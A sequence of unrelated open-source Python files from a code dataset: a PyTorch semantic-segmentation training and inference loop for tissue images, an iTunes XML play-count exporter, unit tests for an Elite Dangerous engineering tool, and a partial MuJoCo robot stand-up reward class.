torch_utils.set_seed(self.training_parameters['random_state'], deterministic_cudnn=self.training_parameters['deterministic_cudnn'])\n device = torch.device(self.training_parameters['device'])\n criterion = getattr(torch_modules, self.training_parameters['loss_function'])(**self.training_parameters['loss_args'])\n\n if self.model_parameters['model_module'] in ['smp', 'monai']:\n model = torch_modules.SemanticSegmentationModel(\n self.model_parameters['model_module'],\n self.model_parameters['model_class'],\n self.model_parameters['model_args']\n )\n elif self.model_parameters['model_module'] == 'transformers':\n model = torch_modules.HuggingFaceTransformersModel(\n self.model_parameters['model_class'],\n self.model_parameters['model_args'],\n self.model_parameters['upsample_args']\n )\n elif self.model_parameters['model_module'] == 'unet_daformer':\n model = torch_modules.UNetDAFormerModel(**self.model_parameters['model_args'])\n elif self.model_parameters['model_module'] == 'coat_daformer':\n model = torch_modules.CoaTDAFormer(**self.model_parameters['model_args'])\n else:\n raise ValueError('Invalid Model Module')\n\n if self.model_parameters['model_checkpoint_path'] is not None:\n model.load_state_dict(torch.load(self.model_parameters['model_checkpoint_path']))\n model.to(device)\n\n # Set optimizer, learning rate scheduler and stochastic weight averaging\n optimizer = getattr(optim, self.training_parameters['optimizer'])(model.parameters(), **self.training_parameters['optimizer_args'])\n scheduler = getattr(optim.lr_scheduler, self.training_parameters['lr_scheduler'])(optimizer, **self.training_parameters['lr_scheduler_args'])\n if self.training_parameters['swa_start_epoch'] > 0:\n swa_model = swa_utils.AveragedModel(model, device=device)\n swa_scheduler = swa_utils.SWALR(\n optimizer,\n swa_lr=self.training_parameters['swa_lr'],\n anneal_epochs=self.training_parameters['swa_anneal_epochs'],\n anneal_strategy=self.training_parameters['swa_anneal_strategy'],\n last_epoch=-1\n )\n else:\n swa_model = None\n swa_scheduler = None\n\n early_stopping = False\n summary = {\n 'train_loss': [],\n 'val_loss': [],\n 'val_dice_coefficient': [],\n 'val_intersection_over_union': []\n }\n\n for epoch in range(1, self.training_parameters['epochs'] + 1):\n\n if early_stopping:\n break\n\n if self.training_parameters['lr_scheduler'] == 'ReduceLROnPlateau':\n # Step on validation loss if learning rate scheduler is ReduceLROnPlateau\n train_loss = self.train(train_loader, model, criterion, optimizer, device, scheduler=None)\n val_loss, val_dice_coefficients, val_intersection_over_unions = self.validate(val_loader, model, criterion, device)\n scheduler.step(val_loss)\n else:\n # Learning rate scheduler works in training function if it is not ReduceLROnPlateau\n train_loss = self.train(train_loader, model, criterion, optimizer, device, scheduler)\n val_loss, val_dice_coefficients, val_intersection_over_unions = self.validate(val_loader, model, criterion, device)\n\n if self.training_parameters['swa_start_epoch'] > 0:\n if epoch >= self.training_parameters['swa_start_epoch']:\n swa_model.update_parameters(model)\n swa_scheduler.step()\n\n logging.info(\n f'''\n Epoch {epoch} - Training Loss: {train_loss:.4f} Validation Loss: {val_loss:.4f}\n Dice Coefficients: {val_dice_coefficients[0]} (Mean Dice Coefficient {val_dice_coefficients[1]:.4f})\n Intersection over Unions: {val_intersection_over_unions[0]} (Mean Intersection over Union {val_intersection_over_unions[1]:.4f})\n '''\n )\n\n if epoch in self.persistence_parameters['save_epoch_model']:\n # Save model if current epoch is specified to be saved\n torch.save(model.state_dict(), model_root_directory / f'model_{fold}_epoch_{epoch}.pt')\n logging.info(f'Saved model_{fold}_epoch_{epoch}.pt to {model_root_directory}')\n\n best_val_loss = np.min(summary['val_loss']) if len(summary['val_loss']) > 0 else np.inf\n if val_loss < best_val_loss:\n # Save model if validation loss improves\n if self.persistence_parameters['save_best_model']:\n torch.save(model.state_dict(), model_root_directory / f'model_{fold}_best.pt')\n logging.info(f'Saved model_{fold}_best.pt to {model_root_directory} (validation loss decreased from {best_val_loss:.6f} to {val_loss:.6f})')\n\n # Save epoch predictions visualizations if validation loss improves\n if self.persistence_parameters['visualize_epoch_predictions']:\n\n model.eval()\n\n # Create directory for epoch predictions visualizations\n epoch_predictions_directory = Path(model_root_directory / 'epoch_predictions')\n epoch_predictions_directory.mkdir(parents=True, exist_ok=True)\n\n # Sample single image for every organ type from training set with fixed random seed for evaluating epochs\n np.random.seed(self.training_parameters['random_state'])\n df_evaluation = pd.concat((\n df_train.loc[val_idx, :].groupby('organ').sample(1),\n df_test\n ), ignore_index=True, axis=0)\n\n for idx, row in df_evaluation.iterrows():\n\n if row['data_source'] == 'HPA' or row['data_source'] == 'Hubmap':\n evaluation_image = tifffile.imread(row['image_filename'])\n elif row['data_source'] == 'GTEx':\n evaluation_image = cv2.imread(row['image_filename'])\n else:\n raise ValueError(f'Invalid data source: {row[\"data_source\"]}')\n\n if idx != (df_evaluation.shape[0] - 1):\n evaluation_ground_truth_mask = annotation_utils.decode_rle_mask(rle_mask=row['rle'], shape=evaluation_image.shape[:2])\n if row['data_source'] == 'Hubmap' or row['data_source'] == 'HPA':\n evaluation_ground_truth_mask = evaluation_ground_truth_mask.T\n else:\n evaluation_ground_truth_mask = None\n\n evaluation_inputs = dataset_transforms['val'](image=evaluation_image)['image'].float()\n evaluation_inputs = evaluation_inputs.to(device)\n\n with torch.no_grad():\n evaluation_outputs = model(torch.unsqueeze(evaluation_inputs, dim=0))\n\n evaluation_predictions_mask = torch.sigmoid(torch.squeeze(torch.squeeze(evaluation_outputs.detach().cpu(), dim=0), dim=0)).numpy().astype(np.float32)\n # Resize evaluation predictions mask back to its original size and evaluate it on multiple thresholds\n evaluation_predictions_mask = cv2.resize(evaluation_predictions_mask, (evaluation_image.shape[1], evaluation_image.shape[0]), interpolation=cv2.INTER_CUBIC)\n evaluation_summary = evaluation.evaluate_predictions(\n ground_truth=evaluation_ground_truth_mask,\n predictions=evaluation_predictions_mask,\n threshold=self.inference_parameters['label_thresholds'][row['data_source']][row['organ']],\n thresholds=self.inference_parameters['label_threshold_range']\n )\n\n # Convert evaluation predictions mask's soft predictions to labels and visualize it\n evaluation_predictions_mask = metrics.soft_predictions_to_labels(x=evaluation_predictions_mask, threshold=self.inference_parameters['label_thresholds'][row['data_source']][row['organ']])\n visualization.visualize_predictions(\n image=evaluation_image,\n ground_truth=evaluation_ground_truth_mask,\n predictions=evaluation_predictions_mask,\n metadata=row.to_dict(),\n evaluation_summary=evaluation_summary,\n path=epoch_predictions_directory / f'{row[\"id\"]}_{row[\"organ\"]}_{fold}_epoch{epoch}_{val_loss:.4f}_predictions.png'\n )\n\n logging.info(f'Saved {fold} epoch {epoch} predictions to {epoch_predictions_directory}')\n\n summary['train_loss'].append(train_loss)\n summary['val_loss'].append(val_loss)\n summary['val_dice_coefficient'].append(np.median(list(val_dice_coefficients[0].values())))\n summary['val_intersection_over_union'].append(np.median(list(val_intersection_over_unions[0].values())))\n\n best_epoch = np.argmin(summary['val_loss'])\n if self.training_parameters['early_stopping_patience'] > 0:\n # Trigger early stopping if early stopping patience is greater than 0\n if len(summary['val_loss']) - best_epoch >= self.training_parameters['early_stopping_patience']:\n logging.info(\n f'''\n Early Stopping (validation loss didn\\'t improve for {self.training_parameters[\"early_stopping_patience\"]} epochs)\n Best Epoch ({best_epoch + 1}) Validation Loss: {summary[\"val_loss\"][best_epoch]:.6f} Dice Coefficient: {summary[\"val_dice_coefficient\"][best_epoch]:.4f} Intersection over Union: {summary[\"val_intersection_over_union\"][best_epoch]:.4f}\n '''\n )\n early_stopping = True\n scores.append({\n 'val_loss': summary['val_loss'][best_epoch],\n 'val_dice_coefficient': summary['val_dice_coefficient'][best_epoch],\n 'val_intersection_over_union': summary['val_intersection_over_union'][best_epoch]\n })\n else:\n if epoch == self.training_parameters['epochs']:\n scores.append({\n 'val_loss': summary['val_loss'][-1],\n 'val_dice_coefficient': summary['val_dice_coefficient'][-1],\n 'val_intersection_over_union': summary['val_intersection_over_union'][-1]\n })\n\n if self.persistence_parameters['visualize_learning_curve']:\n visualization.visualize_learning_curve(\n training_losses=summary['train_loss'],\n validation_losses=summary['val_loss'],\n path=model_root_directory / f'learning_curve_{fold}.png'\n )\n logging.info(f'Saved learning_curve_{fold}.png to {model_root_directory}')\n\n if self.training_parameters['swa_start_epoch'] > 0:\n # Perform one pass over data to estimate the activation statistics for batch normalization layers in the model\n swa_utils.update_bn(train_loader, swa_model, device=device)\n\n df_scores = pd.DataFrame(scores)\n for score_idx, row in df_scores.iterrows():\n logging.info(f'Fold {int(score_idx) + 1} - Validation Scores: {json.dumps(row.to_dict(), indent=2)}')\n logging.info(f'\\nMean Validation Scores: {json.dumps(df_scores.mean(axis=0).to_dict(), indent=2)} (±{json.dumps(df_scores.std(axis=0).to_dict(), indent=2)})')\n\n if self.persistence_parameters['visualize_training_scores']:\n visualization.visualize_scores(\n df_scores=df_scores,\n path=model_root_directory / f'training_scores.png'\n )\n logging.info(f'Saved training_scores.png to {model_root_directory}')\n\n def inference(self, df_train):\n\n \"\"\"\n Inference on inputs and targets listed on given dataframes with specified configuration and transforms\n\n Parameters\n ----------\n df_train (pandas.DataFrame of shape (n_rows, n_columns)): Dataframe of filenames, targets and folds\n \"\"\"\n\n logging.info(f'\\n{\"-\" * 30}\\nRunning {self.persistence_parameters[\"name\"]} Model for Inference - Seed: {self.training_parameters[\"random_state\"]}\\n{\"-\" * 30}\\n')\n\n # Create directory for models and visualizations\n model_root_directory = Path(settings.MODELS / self.persistence_parameters['name'])\n model_root_directory.mkdir(parents=True, exist_ok=True)\n # Create directory for final predictions visualizations\n final_predictions_directory = Path(model_root_directory / 'final_predictions')\n final_predictions_directory.mkdir(parents=True, exist_ok=True)\n\n dataset_transforms = transforms.get_semantic_segmentation_transforms(**self.transform_parameters)\n\n for fold in self.inference_parameters['folds']:\n\n val_idx = df_train.loc[df_train[fold] == 1].index\n logging.info(f'\\n{fold} - Validation {len(val_idx)} ({len(val_idx) // self.training_parameters[\"test_batch_size\"] + 1} steps)')\n\n # Set model, loss function, device and seed for reproducible results\n torch_utils.set_seed(self.training_parameters['random_state'], deterministic_cudnn=self.training_parameters['deterministic_cudnn'])\n device = torch.device(self.training_parameters['device'])\n if self.model_parameters['model_module'] in ['smp', 'monai']:\n model = torch_modules.SemanticSegmentationModel(\n self.model_parameters['model_module'],\n self.model_parameters['model_class'],\n self.model_parameters['model_args']\n )\n elif self.model_parameters['model_module'] == 'transformers':\n model = torch_modules.HuggingFaceTransformersModel(\n self.model_parameters['model_class'],\n self.model_parameters['model_args'],\n self.model_parameters['upsample_args']\n )\n elif self.model_parameters['model_module'] == 'unet_daformer':\n model = torch_modules.UNetDAFormerModel(**self.model_parameters['model_args'])\n elif self.model_parameters['model_module'] == 'coat_daformer':\n model = torch_modules.CoaTDAFormer(**self.model_parameters['model_args'])\n else:\n raise ValueError('Invalid Model Module')\n\n model.load_state_dict(torch.load(model_root_directory / f'model_{fold}_best.pt'))\n model.to(device)\n model.eval()\n\n for idx, row in tqdm(df_train.loc[val_idx, :].iterrows(), total=len(val_idx)):\n\n if row['data_source'] == 'HPA' or row['data_source'] == 'Hubmap':\n image = tifffile.imread(row['image_filename'])\n elif row['data_source'] == 'GTEx':\n image = cv2.imread(row['image_filename'])\n else:\n raise ValueError(f'Invalid data source: {row[\"data_source\"]}')\n\n image_resized = cv2.resize(\n image,\n dsize=self.inference_parameters['size'][row['data_source']][row['organ']],\n interpolation=cv2.INTER_CUBIC\n )\n\n if self.inference_parameters['tta']:\n # Stack augmented images on batch dimension\n inputs = [\n image_resized,\n test_time_augmentations.horizontal_flip(image_resized),\n test_time_augmentations.vertical_flip(image_resized),\n test_time_augmentations.horizontal_flip(test_time_augmentations.vertical_flip(image_resized))\n ]\n inputs = torch.cat([\n torch.unsqueeze(dataset_transforms['test'](image=image)['image'], dim=0)\n for image in inputs\n ], dim=0)\n else:\n inputs = torch.unsqueeze(dataset_transforms['test'](image=image_resized)['image'], dim=0)\n\n inputs = inputs.to('cuda')\n\n with torch.no_grad():\n outputs = model(inputs)\n\n predictions_mask = outputs.detach().cpu()\n predictions_mask = torch.sigmoid(torch.squeeze(predictions_mask, dim=1)).numpy().astype(np.float32)\n\n if self.inference_parameters['tta']:\n # Apply inverse of test-time augmentations and aggregate predictions\n predictions_mask[1, :, :] = test_time_augmentations.horizontal_flip(predictions_mask[1, :, :])\n predictions_mask[2, :, :] = test_time_augmentations.vertical_flip(predictions_mask[2, :, :])\n predictions_mask[3, :, :] = test_time_augmentations.horizontal_flip(test_time_augmentations.vertical_flip(predictions_mask[3, :, :]))\n predictions_mask = np.mean(predictions_mask, axis=0)\n\n # Decode RLE mask string into 2d binary semantic segmentation mask array\n ground_truth_mask = annotation_utils.decode_rle_mask(rle_mask=row['rle'], shape=image.shape[:2])\n if row['data_source'] == 'Hubmap' or row['data_source'] == 'HPA':\n ground_truth_mask = ground_truth_mask.T\n\n # Resize predictions mask back to its original size and evaluate it\n predictions_mask = cv2.resize(predictions_mask, (image.shape[1], image.shape[0]), interpolation=cv2.INTER_CUBIC)\n predictions_evaluation_summary = evaluation.evaluate_predictions(\n ground_truth=ground_truth_mask,\n predictions=predictions_mask,\n threshold=self.inference_parameters['label_thresholds'][row['data_source']][row['organ']],\n thresholds=self.inference_parameters['label_threshold_range'])\n\n if self.persistence_parameters['evaluate_final_predictions']:\n with open(final_predictions_directory / f'{row[\"id\"]}_evaluation.json', mode='w') as f:\n json.dump(predictions_evaluation_summary, f, indent=2)\n\n df_train.loc[df_train['id'] == row['id'], 'dice_coefficient'] = predictions_evaluation_summary['scores']['dice_coefficient']\n df_train.loc[df_train['id'] == row['id'], 'intersection_over_union'] = predictions_evaluation_summary['scores']['intersection_over_union']\n\n try:\n label_threshold = self.inference_parameters['label_thresholds'][row['data_source']][row['organ']]\n except KeyError:\n # Set label threshold to 0.1 for unseen organs or data sources\n label_threshold = 0.1\n\n # Convert evaluation predictions mask's soft predictions to labels\n predictions_mask = metrics.soft_predictions_to_labels(x=predictions_mask, threshold=label_threshold)\n\n if self.persistence_parameters['visualize_final_predictions']:\n visualization.visualize_predictions(\n image=image,\n ground_truth=ground_truth_mask,\n predictions=predictions_mask,\n metadata=row.to_dict(),\n evaluation_summary=predictions_evaluation_summary,\n path=final_predictions_directory / f'{row[\"id\"]}_{row[\"organ\"]}_predictions.png'\n )\n\n logging.info(f'Saved predictions evaluation summaries and predictions visualizations to {final_predictions_directory}')\n\n scores_evaluation_summary = evaluation.evaluate_scores(df=df_train, folds=self.inference_parameters['folds'])\n logging.info(json.dumps(scores_evaluation_summary, indent=2))\n with open(model_root_directory / f'inference_scores.json', mode='w') as f:\n json.dump(scores_evaluation_summary, f, indent=2)\n\n logging.info(f'Saved inference_scores.json to {model_root_directory}')\n","repo_name":"gunesevitan/hubmap-hpa-hacking-the-human-body","sub_path":"src/torch_trainers.py","file_name":"torch_trainers.py","file_ext":"py","file_size_in_byte":29690,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"36792274006","text":"\"\"\"Extract play-count information form itunes xml.\"\"\"\nfrom lxml import etree\nimport argparse\nimport sys\nfrom tqdm import tqdm\nimport csv\nfrom pprint import pprint\nimport os\nfrom datetime import datetime\n\n\nclass ItunesXml(object):\n \"\"\"Object to interact with itunes xml.\"\"\"\n\n def __init__(self, path):\n \"\"\"Open itunes xml file.\"\"\"\n self.path = path\n\n def extract_plays(self, output=None):\n \"\"\"Extract play information from xml.\n\n kwargs:\n output(str): format to deliver results in; currently\n only accepted value is csv.\n \"\"\"\n self.output = output\n self.play_count_data = []\n self._load_xml()\n\n def _build_csv(self):\n \"\"\"Use list of song data to generate scrobble-friendly csv.\"\"\"\n self.csv = []\n for record in tqdm(self.play_count_data):\n if self._unplayed(record):\n pass\n else:\n self.csv += self._get_row_data(record)\n # pprint(self.csv[0:6])\n self._store_csv()\n\n def _store_csv(self):\n csv_path = self._get_csv_path()\n with open(csv_path, \"w\") as csvfile:\n fieldnames = [\"artist\", \"song\", \"album\",\n \"timestamp\", \"album_artist\", \"duration\"]\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n for row in tqdm(self.csv):\n writer.writerow(row)\n print(\"Wrote file at {0}\".format(csv_path))\n\n def _get_csv_path(self):\n \"\"\"Store csv file next to source xml.\"\"\"\n return os.path.splitext(self.path)[0] + \".csv\"\n\n def _unplayed(self, record):\n \"\"\"Check if song has been played.\n\n args:\n record(dict): full record for a given song\n \"\"\"\n return \"Play Count\" not in record or record.get(\"Play Count\", \"0\") == \"0\"\n\n def _get_row_data(self, record):\n \"\"\"Produce rows for each play of the supplied track.\n\n args:\n record(dict): all track data\n \"\"\"\n rdata = []\n artist = record.get(\"Artist\", \"\")\n album_artist = record.get(\"Album Artist\", \"\")\n song = record[\"Name\"]\n album = record.get(\"Album\", \"\")\n play_count = record[\"Play Count\"]\n duration = int(record[\"Total Time\"]) / 1000\n last_play = record[\"Play Date UTC\"]\n date_added = record[\"Date Added\"]\n playtimes = self._get_playtimes(date_added, last_play, int(play_count))\n for playtime in playtimes:\n playdata = {\"artist\": artist,\n \"song\": song,\n \"album\": album,\n \"timestamp\": playtime,\n \"album_artist\": album_artist,\n \"duration\": duration\n }\n rdata.append(playdata)\n return rdata\n\n def _get_playtimes(self, add_date, play_date, plays):\n \"\"\"Get play dates for tracks.\n\n Play times will be generated using average interval\n between date the track was added and its most recent play.\n\n args:\n add_date(str): UTC formatted date string\n play_date(str): UTC formatted date string\n plays(int): play count\n \"\"\"\n play_date = datetime.strptime(play_date, \"%Y-%m-%dT%H:%M:%SZ\")\n if plays == \"1\":\n playtimes = [datetime.strftime(play_date, \"%Y-%m-%d %H:%m:%S\")]\n else:\n add_date = datetime.strptime(add_date, \"%Y-%m-%dT%H:%M:%SZ\")\n # Split plays evenly over elapsed time between adding tack and most\n # recent play.\n interval = (play_date - add_date) / plays\n playtimes = []\n for i in range(plays):\n play_time = add_date + interval * (i + 1)\n playtimes.append(datetime.strftime(play_time, \"%Y-%m-%d %H:%m:%S\"))\n return playtimes\n\n def _load_xml(self):\n \"\"\"Begin xml pipeline.\"\"\"\n self._xml = etree.parse(self.path)\n print(\"Loading XML...\")\n self._load_songs()\n\n def _load_songs(self):\n \"\"\"Find and load song trees.\"\"\"\n self._songs = self._xml.xpath(\"/plist/dict/dict/dict\")\n self._process_songs()\n\n def _process_songs(self):\n \"\"\"Iterate through songs.\"\"\"\n print(\"Processing songs...\")\n for song in tqdm(self._songs):\n self._song_data = {}\n self._process_song(song)\n self.play_count_data.append(self._song_data)\n print(\"Found data for {0} songs\".format(len(self.play_count_data)))\n # pprint(self.play_count_data[0])\n self._build_output()\n\n def _build_output(self):\n \"\"\"Output results to user.\"\"\"\n if self.output == \"csv\":\n self._build_csv()\n\n def _process_song(self, song):\n \"\"\"Process individual song data.\n\n args:\n song(etreeElement): lxml Element type of the song level,\n including descendents.\n \"\"\"\n for elem in song.iterchildren():\n self._process_element(elem)\n\n def _process_element(self, elem):\n \"\"\"Isolate and store element.\n\n Each elem should have a tag named either 'key' or the format of data\n stored in the value described by the key. See xml sample below for details.\n\n args:\n elem(etreeElement): tree for each\n \"\"\"\n if elem.tag == \"key\":\n self._current_key = elem.text\n else:\n value = elem.text\n self._song_data[self._current_key] = value\n\n\ndef process_args(args=None):\n \"\"\"Process command line arguments from user.\n\n kwargs:\n args(list): list of args passed by user.\n \"\"\"\n desc = \"Extract play count data from iTunes XML library data.\"\n parser = argparse.ArgumentParser(description=desc)\n parser.add_argument(\"path_to_xml\",\n help=\"Path to valid iTunes library XML file.\",\n metavar=\"path_to_xml\")\n parser.add_argument(\"-o\", \"--output\",\n help=\"Desired output format.\",\n default=None,\n dest=\"output_format\",\n metavar=\"output_format\",\n choices=[\"csv\"])\n return parser.parse_args(args)\n\n\nif __name__ == \"__main__\":\n arg = process_args(sys.argv[1:])\n ixml = ItunesXml(arg.path_to_xml)\n ixml.extract_plays(output=arg.output_format)\n\n\n# XML Data Sample\n\n\"\"\"\n\n\n\n\n Major Version1\n Minor Version1\n Date2011-12-14T06:49:42Z\n Application Version10.5.1\n Features5\n Show Content Ratings\n Music Folderfile://localhost/C:/Users/Devin/Music/\n Library Persistent IDCBE4B2A8B3CCB499\n Tracks\n \n 4138\n \n Track ID4138\n NameWarped Mind\n ArtistShed\n Album Artistva\n AlbumBerghain 02 Part I\n Groupingostgut tonträger\n GenreTechno\n KindMPEG audio file\n Size17639662\n Total Time432875\n Year2008\n Date Modified2009-05-30T00:09:46Z\n Date Added2009-05-26T05:12:24Z\n Bit Rate320\n Sample Rate44100\n Play Count5\n Play Date3401878234\n Play Date UTC2011-10-19T20:10:34Z\n Skip Count1\n Skip Date2009-12-23T20:32:51Z\n Artwork Count1\n Persistent IDBB925F8B0C12246C\n Track TypeFile\n Locationfile://localhost/mind.mp3\n File Folder Count-1\n Library Folder Count-1\n \n\"\"\"\n\n# Individual Output (Python Dict)\n\n\"\"\"\n{'Album': 'Berghain 02 Part I',\n 'Album Artist': 'va',\n 'Artist': 'Shed',\n 'Artwork Count': '1',\n 'Bit Rate': '320',\n 'Date Added': '2009-05-26T05:12:24Z',\n 'Date Modified': '2009-05-30T00:09:46Z',\n 'File Folder Count': '-1',\n 'Genre': 'Techno',\n 'Grouping': 'ostgut tonträger',\n 'Kind': 'MPEG audio file',\n 'Library Folder Count': '-1',\n 'Location': 'file://localhost/D:/music/Music/va/Berghain%2002%20Part%20I/Warped%20Mind.mp3',\n 'Name': 'Warped Mind',\n 'Persistent ID': 'BB925F8B0C12246C',\n 'Play Count': '5',\n 'Play Date': '3401878234',\n 'Play Date UTC': '2011-10-19T20:10:34Z',\n 'Sample Rate': '44100',\n 'Size': '17639662',\n 'Skip Count': '1',\n 'Skip Date': '2009-12-23T20:32:51Z',\n 'Total Time': '432875',\n 'Track ID': '4138',\n 'Track Type': 'File',\n 'Year': '2008'}\n \"\"\"\n","repo_name":"devinhiggins/itunesxml","sub_path":"itunesxml.py","file_name":"itunesxml.py","file_ext":"py","file_size_in_byte":9549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28626889297","text":"\"\"\"\nTests the summary of engineers\n\"\"\"\n\nfrom ed_engineer_shopping_list_builder import inputs, utils, summarize_engineers\nfrom ed_engineer_shopping_list_builder.engineers import (\n LizRyder,\n LeiCheung,\n BillTurner,\n SeleneJean,\n JuriIshmaak,\n)\nfrom ed_engineer_shopping_list_builder.ship_components import (\n Armour,\n DetailedSurfaceScanner,\n FrameShiftWakeScanner,\n HullReinforcementPackage,\n KillWarrantScanner,\n ManifestScanner,\n MineLauncher,\n MissileRack,\n Sensors,\n TorpedoPylon,\n)\n\n\ndef test_get_available_engineers(monkeypatch):\n \"\"\"\n .\n \"\"\"\n monkeypatch.setattr(\n inputs,\n \"make_choices\",\n lambda *args, **kwargs: [\"Bill Turner\", \"Liz Ryder\", \"Lei Cheung\"],\n )\n assert summarize_engineers.get_available_engineers() == [\n BillTurner,\n LizRyder,\n LeiCheung,\n ], \"Expected engineers returned\"\n\n\ndef test_simplify_components():\n \"\"\"\n .\n \"\"\"\n assert summarize_engineers.simplify_engineer_components(\n [SeleneJean, JuriIshmaak, LizRyder]\n ) == {\n Armour: SeleneJean,\n DetailedSurfaceScanner: JuriIshmaak,\n FrameShiftWakeScanner: JuriIshmaak,\n HullReinforcementPackage: SeleneJean,\n KillWarrantScanner: JuriIshmaak,\n ManifestScanner: JuriIshmaak,\n MineLauncher: JuriIshmaak,\n MissileRack: LizRyder,\n Sensors: JuriIshmaak,\n TorpedoPylon: LizRyder,\n }, \"Correct modifications returned\"\n\n\ndef test_print_summary(monkeypatch, capsys):\n \"\"\"\n .\n \"\"\"\n # pylint: disable=unused-argument\n monkeypatch.setattr(\n utils, \"organize_components_by_classification\", lambda components: []\n )\n monkeypatch.setattr(\n utils,\n \"get_component_summary_by_classification\",\n lambda components, func: \"a description\",\n )\n\n summarize_engineers.print_component_summary({})\n printed = capsys.readouterr()\n assert printed.out == \"a description\\n\", \"Ship summary returned\"\n\n\ndef test_summarize_engineers(monkeypatch):\n \"\"\"\n .\n \"\"\"\n\n # pylint: disable=unused-argument\n @utils.counter_wrapper\n def get_available(*args, **kwargs):\n \"\"\"\n .\n \"\"\"\n\n @utils.counter_wrapper\n def simplify(*args, **kwargs):\n \"\"\"\n .\n \"\"\"\n\n @utils.counter_wrapper\n def print_summary(*args, **kwargs):\n \"\"\"\n .\n \"\"\"\n\n monkeypatch.setattr(summarize_engineers, \"get_available_engineers\", get_available)\n monkeypatch.setattr(summarize_engineers, \"simplify_engineer_components\", simplify)\n monkeypatch.setattr(summarize_engineers, \"print_component_summary\", print_summary)\n\n summarize_engineers.summarize_engineers()\n assert get_available.counter == 1, \"Available engineers returned\"\n assert simplify.counter == 1, \"Simplified components\"\n assert print_summary.counter == 1, \"Printed summary\"\n","repo_name":"ammesonb/ed-engineer-shopping-list-builder","sub_path":"tests/test_summarize_engineers.py","file_name":"test_summarize_engineers.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26820850115","text":"from rail_walker_interface import JoystickPolicyRewardProvider, JoystickPolicyTerminationConditionProvider\nfrom rail_mujoco_walker import JoystickPolicyProviderWithDMControl, add_sphere_to_mjv_scene, add_arrow_to_mjv_scene, JoystickPolicyDMControlTask, RailSimWalkerDMControl, find_dm_control_non_contacting_height\nfrom dm_control.mujoco.engine import Physics as EnginePhysics\nimport mujoco\nimport numpy as np\nfrom typing import Any, Tuple, Optional\nimport transforms3d as tr3d\n\nJOINT_WEIGHTS = np.array([1.0, 0.75, 0.5] * 4)\n\nclass ResetRewardProvider(JoystickPolicyRewardProvider[RailSimWalkerDMControl],JoystickPolicyProviderWithDMControl):\n SUCCESS_RATE_REW_THRES = 0.8\n\n def __init__(\n self,\n use_energy_penalty: bool = False,\n ) -> None:\n JoystickPolicyRewardProvider.__init__(self)\n JoystickPolicyProviderWithDMControl.__init__(self)\n self.use_energy_penalty = use_energy_penalty\n self.rew = 0.0\n self.standup_height : float = None\n \n def get_reward(self) -> float:\n return self.rew\n\n def reset_reward(\n self, \n Robot: RailSimWalkerDMControl, \n info_dict: dict[str,Any], \n termination_provider_triggered: JoystickPolicyTerminationConditionProvider,\n randomState: np.random.RandomState\n ) -> None:\n self.rew = 0.0\n info_dict[\"reward_roll\"] = 0.0\n info_dict[\"reward_height\"] = 0.0\n info_dict[\"reward_pose\"] = 0.0\n info_dict[\"reward_qvel\"] = 0.0\n info_dict[\"reward_stand\"] = 0.0\n info_dict[\"cos_dist\"] = 0.0\n info_dict[\"energy\"] = 0.0\n info_dict[\"success_rate\"] = 0.0\n self.standup_height = 0.325\n\n # # Retrieve the target height\n # physics = Robot.mujoco_walker._last_physics\n # # Remember the previous state of the robot\n # prev_joint = Robot.get_joint_qpos()\n # prev_pos, prev_quat = Robot.mujoco_walker.get_pose(physics)\n # # Set the robot to standup pose\n # find_dm_control_non_contacting_height(physics, Robot.mujoco_walker, prev_pos[0], prev_pos[1], Robot.joint_qpos_init, prev_quat)\n # self.standup_height = Robot.mujoco_walker.get_position(physics)[2] # retrieve the height of the robot\n # # reset the robot back to previous state\n # with physics.reset_context():\n # Robot.mujoco_walker.set_pose(physics, prev_pos, prev_quat)\n # physics.bind(Robot.mujoco_walker.joints).qpos[:] = prev_joint\n # #print(\"Standup height: \", self.standup_height)\n\n def _log_success_rate(\n self, \n info_dict: dict[str,Any], \n rew_roll : float,\n rew_height : float,\n rew_pose : float\n ) -> None:\n if rew_roll > __class__.SUCCESS_RATE_REW_THRES and rew_height > __class__.SUCCESS_RATE_REW_THRES and rew_pose > __class__.SUCCESS_RATE_REW_THRES:\n info_dict[\"success_rate\"] = 1.0\n else:\n info_dict[\"success_rate\"] = 0.0\n\n def _calc_reward_roll(\n self,\n Robot: RailSimWalkerDMControl\n ) -> Tuple[float, float]:\n cos_dist = tr3d.quaternions.quat2mat(Robot.get_framequat_wijk())[-1,-1] # See if the z-axis is pointing up\n r_roll = (0.5 * cos_dist + 0.5)**2\n return r_roll, cos_dist\n\n def _calc_reward_stand(\n self,\n Robot: RailSimWalkerDMControl\n ) -> float:\n # height match reward\n tar_h = self.standup_height\n # root_h = Robot.get_root_height()\n root_h = Robot.get_3d_location()[-1]\n # root_h = physics.bind(self._robot.root_body).xpos[-1]\n h_err = tar_h - root_h\n h_err /= tar_h\n h_err = np.clip(h_err, 0.0, 1.0)\n r_height = 1.0 - h_err\n\n # pose match reward\n joint_pose = Robot.get_joint_qpos()\n tar_pose = Robot.joint_qpos_init\n pose_diff = tar_pose - joint_pose\n pose_diff = JOINT_WEIGHTS * JOINT_WEIGHTS * pose_diff * pose_diff\n pose_err = np.sum(pose_diff)\n r_pose = np.exp(-0.6 * pose_err)\n\n # pose velocity reward\n tar_vel = 0.0\n joint_vel = Robot.get_joint_qvel()\n vel_diff = tar_vel - joint_vel\n vel_diff = vel_diff * vel_diff\n vel_err = np.sum(vel_diff)\n r_vel = np.exp(-0.02 * vel_err)\n\n r_stand = 0.2 * r_height + 0.6 * r_pose + 0.2 * r_vel\n\n return r_stand, r_height, r_pose, r_vel\n \n def render_scene_callback(self, task : JoystickPolicyDMControlTask, physics : EnginePhysics, scene : mujoco.MjvScene) -> None:\n robot_loc = task.robot.get_3d_location()\n sphere_loc = robot_loc.copy()\n sphere_loc[2] = self.standup_height\n #add_sphere_to_mjv_scene(scene, sphere_loc, 0.1, np.array([1.0, 0.0, 0.0, 1.0]))\n add_arrow_to_mjv_scene(scene, robot_loc, sphere_loc, 0.01, np.array([1.0, 0.0, 0.0, 1.0]))\n\n \n def step_reward(\n self, \n Robot: RailSimWalkerDMControl, \n action_target_qpos: np.ndarray,\n target_goal_world_delta: np.ndarray,\n target_goal_local: np.ndarray,\n target_yaw : float,\n target_delta_yaw: float, \n target_velocity: float,\n velocity_to_goal: float, \n 